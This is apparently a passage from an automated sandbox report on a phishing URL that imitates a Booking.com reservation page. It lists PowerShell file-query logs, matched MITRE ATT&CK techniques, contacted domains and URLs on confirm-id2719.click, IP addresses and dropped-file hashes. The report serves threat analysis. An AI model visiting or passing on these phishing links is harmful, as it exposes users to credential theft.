        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.3448.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Command and Scripting Interpreter        		1
        BITS Jobs        		11
        Process Injection        		11
        Masquerading        		OS Credential Dumping1
        Security Software Discovery        		Remote ServicesData from Local System1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        PowerShell        		2
        Browser Extensions        		1
        DLL Side-Loading        		31
        Virtualization/Sandbox Evasion        		LSASS Memory1
        Process Discovery        		Remote Desktop ProtocolData from Removable Media3
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        DLL Side-Loading        		1
        Extra Window Memory Injection        		1
        BITS Jobs        		Security Account Manager31
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets2
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Rundll32        		Cached Domain Credentials21
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Extra Window Memory Injection        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        files.catbox.moe
        		108.181.20.43
        		truefalse
          		high
          bstatic.com
          		18.238.132.113
          		truefalse
            		high
            code.jquery.com
            		151.101.2.137
            		truefalse
              		high
              partner.booking.com
              		18.161.134.29
              		truefalse
                		high
                www.google.com
                		142.250.114.99
                		truefalse
                  		high
                  confirm-id2719.click
                  		185.208.158.75
                  		truefalse
                    		unknown
                    e10776.b.akamaiedge.net
                    		23.204.148.244
                    		truefalse
                      		high
                      cdn.cookielaw.org
                      		104.18.87.42
                      		truefalse
                        		high
                        try-cloudfront.abtasty.com
                        		108.156.224.37
                        		truefalse
                          		high
                          try.abtasty.com
                          		unknown
                          		unknownfalse
                            		high
                            munchkin.marketo.net
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://confirm-id2719.click/Reservation_files/protect.svgfalse
                                		unknown
                                https://confirm-id2719.click/Reservation_files/no.pngfalse
                                  		unknown
                                  https://confirm-id2719.click/Reservation_files/137927810.jpgfalse
                                    		unknown
                                    https://confirm-id2719.click/antifraudfalse
                                      		unknown
                                      https://confirm-id2719.click/static/manage_light.v14b6812v.cssfalse
                                        		unknown
                                        https://confirm-id2719.click/Reservation_files/318586996.jpgfalse
                                          		unknown
                                          https://confirm-id2719.click/Reservation_files/438648711.jpgfalse
                                            		unknown
                                            https://confirm-id2719.click/Reservation_files/b_logo_blue.pngfalse
                                              		unknown
                                              https://confirm-id2719.click/Reservation_files/166939781.jpgfalse
                                                		unknown
                                                https://confirm-id2719.click/static/favicon.svgfalse
                                                  		unknown
                                                  https://confirm-id2719.click/Reservation_files/319302651.jpgfalse
                                                    		unknown
                                                    https://confirm-id2719.click/false
                                                      		unknown
                                                      https://confirm-id2719.click/static/core_6136b7d7dc3346df1f4c9b379c38fa52.cssfalse
                                                        		unknown
                                                        https://confirm-id2719.click/Reservation_files/625bf8aec1510ce62b414074752052f184a60801.svgfalse
                                                          		unknown
                                                          https://confirm-id2719.click/Reservation_files/319302672.jpgfalse
                                                            		unknown
                                                            https://confirm-id2719.click/stuk/clickfalse
                                                              		unknown
                                                              https://confirm-id2719.click/Reservation_files/1df260bd9a2d14e1601c8c9ff1714c05acf328f8.svgfalse
                                                                		unknown
                                                                https://confirm-id2719.click/Reservation_files/333642474.jpgfalse
                                                                  		unknown
                                                                  https://confirm-id2719.click/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.jsfalse
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    185.208.158.75
                                                                    		confirm-id2719.clickSwitzerland34888SIMPLECARRER2ITfalse
                                                                    104.18.87.42
                                                                    		cdn.cookielaw.orgUnited States13335CLOUDFLARENETUSfalse
                                                                    1.1.1.1
                                                                    		unknownAustralia13335CLOUDFLARENETUSfalse
                                                                    142.250.114.102
                                                                    		unknownUnited States15169GOOGLEUSfalse
                                                                    18.238.132.113
                                                                    		bstatic.comUnited States16509AMAZON-02USfalse
                                                                    142.250.114.99
                                                                    		www.google.comUnited States15169GOOGLEUSfalse
                                                                    142.251.116.113
                                                                    		unknownUnited States15169GOOGLEUSfalse
                                                                    23.204.148.244
                                                                    		e10776.b.akamaiedge.netUnited States16625AKAMAI-ASUSfalse
                                                                    142.250.138.94
                                                                    		unknownUnited States15169GOOGLEUSfalse
                                                                    108.181.20.43
                                                                    		files.catbox.moeCanada852ASN852CAfalse
                                                                    142.250.115.94
                                                                    		unknownUnited States15169GOOGLEUSfalse
                                                                    142.250.113.84
                                                                    		unknownUnited States15169GOOGLEUSfalse
                                                                    142.250.114.95
                                                                    		unknownUnited States15169GOOGLEUSfalse
                                                                    142.251.116.94
                                                                    		unknownUnited States15169GOOGLEUSfalse
                                                                    18.161.134.29
                                                                    		partner.booking.comUnited States3MIT-GATEWAYSUSfalse
                                                                    173.194.208.113
                                                                    		unknownUnited States15169GOOGLEUSfalse
                                                                    151.101.2.137
                                                                    		code.jquery.comUnited States54113FASTLYUSfalse
                                                                    108.156.224.37
                                                                    		try-cloudfront.abtasty.comUnited States16509AMAZON-02USfalse
                                                                    142.250.113.138
                                                                    		unknownUnited States15169GOOGLEUSfalse
                                                                    104.69.85.120
                                                                    		unknownUnited States20940AKAMAI-ASN1EUfalse

                                                                    Private

                                                                    IP
                                                                    192.168.2.18
                                                                    127.0.0.1

                                                                    General Information

                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1701511
                                                                    Start date and time:2025-05-29 15:19:32 +02:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                    Sample URL:http://confirm-id2719.click/
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:20
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • EGA enabled
                                                                    Analysis Mode:stream
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal84.phis.evad.win@29/11@23/214

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 142.251.116.113, 142.251.116.102, 142.251.116.100, 142.251.116.101, 142.251.116.139, 142.251.116.138, 142.250.115.94, 142.250.113.138, 142.250.113.139, 142.250.113.113, 142.250.113.101, 142.250.113.100, 142.250.113.102, 142.250.113.84, 173.194.208.100, 173.194.208.139, 173.194.208.102, 173.194.208.101, 173.194.208.138, 173.194.208.113, 142.250.138.100, 142.250.138.102, 142.250.138.138, 142.250.138.101, 142.250.138.139, 142.250.138.113, 142.250.114.102, 142.250.114.139, 142.250.114.101, 142.250.114.138, 142.250.114.100, 142.250.114.113, 142.250.114.95, 142.251.116.95, 173.194.208.95, 142.250.113.95, 142.251.186.95, 142.250.138.95, 142.250.115.95, 104.69.85.120
                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, www.google-analytics.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: confirm-id2719.click

                                                                    Created / dropped Files

                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.3743433369764474
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:BFC24FE0897A4F6FDE009AA94276C0C0
                                                                    SHA1:1C0FC7B814F751364BE0B5BE411E23BE56E5AC35
                                                                    SHA-256:CE554286D1A0D1109BB706A3ABC47D32904D9BC1AA5D78D1B87F7321E208AC25
                                                                    SHA-512:E5B91E90B3103F0956FD29AC1E25FCABC7A6A08585FC67C069484B310F333E8146CCCAB3CCA6E44207AA8D57825C7F062A451C91B3CD637ED7A912A84EF4D4E2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:=...........@..@"....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..................................-L......#.........`h.................h...............X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16384
                                                                    Entropy (8bit):0.08019355134990572
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E0350D9949B087FD51600DFE41D5A65A
                                                                    SHA1:66B28D2E05D43E1D650B21958EC3898B9C2BFE86
                                                                    SHA-256:EF4B1C6C45672A790CECA3E6854C57445FA28A64A644DCD29146DF6ECF11284B
                                                                    SHA-512:6BFD604106271513B1A449BAD70B4B17D1C750745FC81D6C39C74D67F84C0F8C5B5025EC16CA4BFEA179BC7AF4CC70420A69277877AFC4E4508A768F40D646D5
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:.......................................;...{.......}.......{...............{.......{..:..O.....{.H.................sv......}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\BIT8664.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
